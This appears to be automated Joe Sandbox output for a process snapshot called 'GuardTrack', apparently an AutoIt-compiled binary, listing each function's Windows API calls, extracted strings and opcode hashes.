#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0062730C
WSAGetLastError.WSOCK32(00000000), ref: 0062731F
htons.WSOCK32(?,?,?,00000000,?), ref: 006273D5
inet_ntoa.WSOCK32(?), ref: 00627392

Part of subcall function 0060B4EA: _strlen.LIBCMT ref: 0060B4F4
Part of subcall function 0060B4EA: _memmove.LIBCMT ref: 0060B516

_strlen.LIBCMT ref: 0062742F
_memmove.LIBCMT ref: 00627498

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 07f529a914451d78ba38fb529c0950d651541f083b6c54e86d882b13878c5d9c
Instruction ID: 18f6a23206a6f059b6e1a16f97af87cf821486a16b050dd8c97615823af987b4
Opcode Fuzzy Hash: 07f529a914451d78ba38fb529c0950d651541f083b6c54e86d882b13878c5d9c
Instruction Fuzzy Hash: F081EF71508611AFD324EB24DC89FABBBEAEFC4714F10451DF9519B292EA70ED01CB92

Function 005B1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f083ea21b498039ab6bb466f49048cb8b0bbd20bf6318e0cfa40770067f90d2
Instruction ID: 7fb649e497e5bb07b48847b30fd43342d4d62d13ad5a3d30faffdc0141078092
Opcode Fuzzy Hash: 7f083ea21b498039ab6bb466f49048cb8b0bbd20bf6318e0cfa40770067f90d2
Instruction Fuzzy Hash: 5B717A34900509EFDB088F99CC98AFEBF79FF86311F648159F915AB251C730AA51CBA4

Function 0063B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00FF5C60), ref: 0063BA5D
IsWindowEnabled.USER32(00FF5C60), ref: 0063BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0063BB4D
SendMessageW.USER32(00FF5C60,000000B0,?,?), ref: 0063BB84
IsDlgButtonChecked.USER32(?,?), ref: 0063BBC1
GetWindowLongW.USER32(00FF5C60,000000EC), ref: 0063BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0063BBFB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: eff290ede745e7ac7e75685297a488b1dd9bfbdcfe782eb83979ee301eb9a351
Instruction ID: ea32af58253edeb2b35a9abc71b5c17e5e72c0c1380bf221a9f04947356003de
Opcode Fuzzy Hash: eff290ede745e7ac7e75685297a488b1dd9bfbdcfe782eb83979ee301eb9a351
Instruction Fuzzy Hash: 2D71A034604604AFEB249F54C895FFABBB7EF4A300F146059EA4A97361CB31AD51CBA0

Function 0062FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062FB31
_memset.LIBCMT ref: 0062FBFA
ShellExecuteExW.SHELL32(?), ref: 0062FC3F

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D

GetProcessId.KERNEL32(00000000), ref: 0062FCB6
CloseHandle.KERNEL32(00000000), ref: 0062FCE5

Strings

@, xrefs: 0062FC0E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 7b537658aef03b4fb9f05926de350e46b2113254ce7f5e388ff23b636219c6fc
Instruction ID: 622e928ed2a7b207a01cedc88f041f909e3849d382f1116bb90281019be0eeaf
Opcode Fuzzy Hash: 7b537658aef03b4fb9f05926de350e46b2113254ce7f5e388ff23b636219c6fc
Instruction Fuzzy Hash: D261C475A00A2ADFCB14EF94D4959AEBBF5FF88310F148469E846AB351CB30AD41CF94

Function 0061174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0061178B
GetKeyboardState.USER32(?), ref: 006117A0
SetKeyboardState.USER32(?), ref: 00611801
PostMessageW.USER32(?,00000101,00000010,?), ref: 0061182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 0061184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00611894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006118B7

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0031d65c487bc3d218e660b6f40eeca68b8d4e85b13b6e41b868c319501fc904
Instruction ID: 0bfe1c1c2eadd7ece99d2c1bf79b1cb55cabf19858f0dfdd49b4d807b6119067
Opcode Fuzzy Hash: 0031d65c487bc3d218e660b6f40eeca68b8d4e85b13b6e41b868c319501fc904
Instruction Fuzzy Hash: 3151C3A0A187D53DFB368234C855BFA7EEB5B07304F0C8989E2D94DAC2D298ACD4D750

Function 00611565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 006115A4
GetKeyboardState.USER32(?), ref: 006115B9
SetKeyboardState.USER32(?), ref: 0061161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00611646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00611663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006116A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006116C8

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 21ea98f7d42f44e728fa4215e483d0d1d96dae62585df8e89f7b31481ba4394c
Instruction ID: 6c75cef65215d2c46e405c3fa5ebee9f7be02163604cadc367cbcf86c1f5ae0a
Opcode Fuzzy Hash: 21ea98f7d42f44e728fa4215e483d0d1d96dae62585df8e89f7b31481ba4394c
Instruction Fuzzy Hash: DD51E6A05047D53DFB3287248C55BFABEAB5F07300F0C4589E2D54EAC2D695ACD4E7A1

Function 00615BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00615BC5
_wcsncpy.LIBCMT ref: 00615BFA
_wcsncpy.LIBCMT ref: 00615C2C
_wcsncpy.LIBCMT ref: 00615C5F
_wcsncpy.LIBCMT ref: 00615CA1
_wcsncpy.LIBCMT ref: 00615CDB
_wcsncpy.LIBCMT ref: 00615D0A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 8c933de7a6f54303e3ebaa9ffc90a939047c7cbfc4f413b10ad5de8a3b5ef2b8
Instruction ID: be19e1508371ed71a53769c4e8ac3b63f2248e691e081549a40ed31e56b56e8d
Opcode Fuzzy Hash: 8c933de7a6f54303e3ebaa9ffc90a939047c7cbfc4f413b10ad5de8a3b5ef2b8
Instruction Fuzzy Hash: 394190A5C10619B6CB61EBB8884A9CFB7B9EF84310F504857E509E3211E734A355C7EA

Function 00613B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00613B8A,?), ref: 00614BE0

Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00613B8A,?), ref: 00614BF9

lstrcmpiW.KERNEL32(?,?), ref: 00613BAA
_wcscmp.LIBCMT ref: 00613BC6
MoveFileW.KERNEL32(?,?), ref: 00613BDE
_wcscat.LIBCMT ref: 00613C26
SHFileOperationW.SHELL32(?), ref: 00613C92

Strings

\*.*, xrefs: 00613C20

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: d3e74faef90af62fc39d19f38179c4f1c8eaebadc7161f215f64610fa12687e6
Instruction ID: 48d08e3cf935e5b545f10809a186703a57dc2e7cc928e24257fa3aabb1434721
Opcode Fuzzy Hash: d3e74faef90af62fc39d19f38179c4f1c8eaebadc7161f215f64610fa12687e6
Instruction Fuzzy Hash: 4541BD7140C345AEC752EF64C485ADBB7EDAF89340F44196EF08AC3251EB34D7888B56

Function 006378B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006378CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00637976
IsMenu.USER32(?), ref: 0063798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006379D6
DrawMenuBar.USER32 ref: 006379E9

Strings

0, xrefs: 006378C3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 88acca4ec9eeaf89ee3a8617b647342ce921f8723631169397b5d157540a02fa
Instruction ID: 448145558eb2de26402b082ceeb949a39624322092cb6a3404c7281d614ab61c
Opcode Fuzzy Hash: 88acca4ec9eeaf89ee3a8617b647342ce921f8723631169397b5d157540a02fa
Instruction Fuzzy Hash: 574105B5A04209EFDB20DF54D884ADABBFAFB09351F048269F95997390D770AD50CFA0

Function 00631602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00631631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0063165B
FreeLibrary.KERNEL32(00000000), ref: 00631712

Part of subcall function 00631602: RegCloseKey.ADVAPI32(?), ref: 00631678
Part of subcall function 00631602: FreeLibrary.KERNEL32(?), ref: 006316CA
Part of subcall function 00631602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006316ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 006316B5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 81f1b70e71b28a4dc21bdea8512861926500cc2a34ba636c9712e50790d60f76
Instruction ID: 2e88324f3889d9e949f3c8e933eccbfa6d1e612969f830992a1a5341bb5f963f
Opcode Fuzzy Hash: 81f1b70e71b28a4dc21bdea8512861926500cc2a34ba636c9712e50790d60f76
Instruction Fuzzy Hash: 51313CB5901119BFEB149FD0DC89EFEBBBDEF0A300F040169E901A6250EB759E459BA4

Function 006368F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00636911
GetWindowLongW.USER32(00FF5C60,000000F0), ref: 00636944
GetWindowLongW.USER32(00FF5C60,000000F0), ref: 00636979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006369AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006369D5
GetWindowLongW.USER32(?,000000F0), ref: 006369E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00636A00

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4b01b2a6bfbc1d0365acc835bb8ff3e2e2df548e109d6222da91cb855c29bd63
Instruction ID: 02054c8db36da6665ad83a218cd9b09a3eff4de1211a8dc2fbe00646e2119f9a
Opcode Fuzzy Hash: 4b01b2a6bfbc1d0365acc835bb8ff3e2e2df548e109d6222da91cb855c29bd63
Instruction Fuzzy Hash: 05313735604166AFEB20CF18DC88FA437E2EB4A351F1951A4F6098F2F2CB71AC50CB91

Function 0060E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E2F0
SysAllocString.OLEAUT32(00000000), ref: 0060E2F3
SysAllocString.OLEAUT32(?), ref: 0060E311
SysFreeString.OLEAUT32(?), ref: 0060E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 0060E33F
SysAllocString.OLEAUT32(?), ref: 0060E34D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: def6d5b6939210fbaaf32a4a4d2afde4c422c7c3ad0fc92e66e253d6ae742510
Instruction ID: 3f1f004dde3f44b29f9e8cb14ccbeb96de9f6d97d9bad553aaca56467284430f
Opcode Fuzzy Hash: def6d5b6939210fbaaf32a4a4d2afde4c422c7c3ad0fc92e66e253d6ae742510
Instruction Fuzzy Hash: 8E219776644229BFEF14DFA8DC88CBB77EDEB09360B044525FE14DB290D671AD418760

Function 0062685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00628475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006284A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006268B1
WSAGetLastError.WSOCK32(00000000), ref: 006268C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006268F9
connect.WSOCK32(00000000,?,00000010), ref: 00626902
WSAGetLastError.WSOCK32 ref: 0062690C
closesocket.WSOCK32(00000000), ref: 00626935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0062694E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 4e2f4d9fec63d2a5d09cde2b7b18ee67f97c95d5caedbd80d55aaf8f5aad21f1
Instruction ID: df02983380bd016171cb905d8d58c4f23cf59b1edf0f27d3f5c00a39390c3d3a
Opcode Fuzzy Hash: 4e2f4d9fec63d2a5d09cde2b7b18ee67f97c95d5caedbd80d55aaf8f5aad21f1
Instruction Fuzzy Hash: 2731E771600528AFEF10AF24DC85BFE7BAAEB45724F044019FD05AB291CB74AC448FA1

Function 0060E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E3CB
SysAllocString.OLEAUT32(00000000), ref: 0060E3CE
SysAllocString.OLEAUT32 ref: 0060E3EF
SysFreeString.OLEAUT32 ref: 0060E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 0060E412
SysAllocString.OLEAUT32(?), ref: 0060E420

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7ca8ba5012be12bb3a84df97f5c52bb92168dd100ee81b431510fd18c7eb4104
Instruction ID: 02cd68af20b5171f1e1679b0057e746b4c46c34cdc325a9e9b1b4f455f009db6
Opcode Fuzzy Hash: 7ca8ba5012be12bb3a84df97f5c52bb92168dd100ee81b431510fd18c7eb4104
Instruction Fuzzy Hash: 38218B35644215AFEB149FA8DC88DAF77EDEB493607408529FA05CB3A0D671DC418764

Function 0060FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0060FE2C
__wcsnicmp.LIBCMT ref: 0060FE4D
__wcsnicmp.LIBCMT ref: 0060FE67

Strings

#notrayicon, xrefs: 0060FE24
#OnAutoItStartRegister, xrefs: 0060FE61
#requireadmin, xrefs: 0060FE47

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: c7ac74b08ad1441bd3f42f5b306bfecdcd510141729ec644e03d7fc92308a027
Instruction ID: 55c43b8de93df5b01e17ff5460c21112900a829620fc74228f78e4b03b9477e8
Opcode Fuzzy Hash: c7ac74b08ad1441bd3f42f5b306bfecdcd510141729ec644e03d7fc92308a027
Instruction Fuzzy Hash: A6213A3218021276D338AB24DC1AFF7779AAF91700F50443BF44586BE3E7A59D428395

Function 00637BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
Part of subcall function 005B2111: GetStockObject.GDI32(00000011), ref: 005B2163
Part of subcall function 005B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00637C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00637C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00637C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00637C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00637C8A

Strings

Msctls_Progress32, xrefs: 00637C28

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 5a06733d4b5fb023f46e18e5ddcbd0f663b3ad18dda371cdc774423bbd69a676
Instruction ID: a48f2502baf71db3fd69d5a90afc05db3b390cea2003062b41aa55e603855e38
Opcode Fuzzy Hash: 5a06733d4b5fb023f46e18e5ddcbd0f663b3ad18dda371cdc774423bbd69a676
Instruction Fuzzy Hash: 9711B2B2140219BEEF258F60CC85EE77F5EEF09798F015114BB08A20A0C772AC21DBA4

Function 00619ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00600817,?,?,00000000,00000000), ref: 00619EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00600817,?,?,00000000,00000000), ref: 00619EFF
LoadResource.KERNEL32(?,00000000,?,?,00600817,?,?,00000000,00000000,?,?,?,?,?,?,005C4A14), ref: 00619F0F
SizeofResource.KERNEL32(?,00000000,?,?,00600817,?,?,00000000,00000000,?,?,?,?,?,?,005C4A14), ref: 00619F20
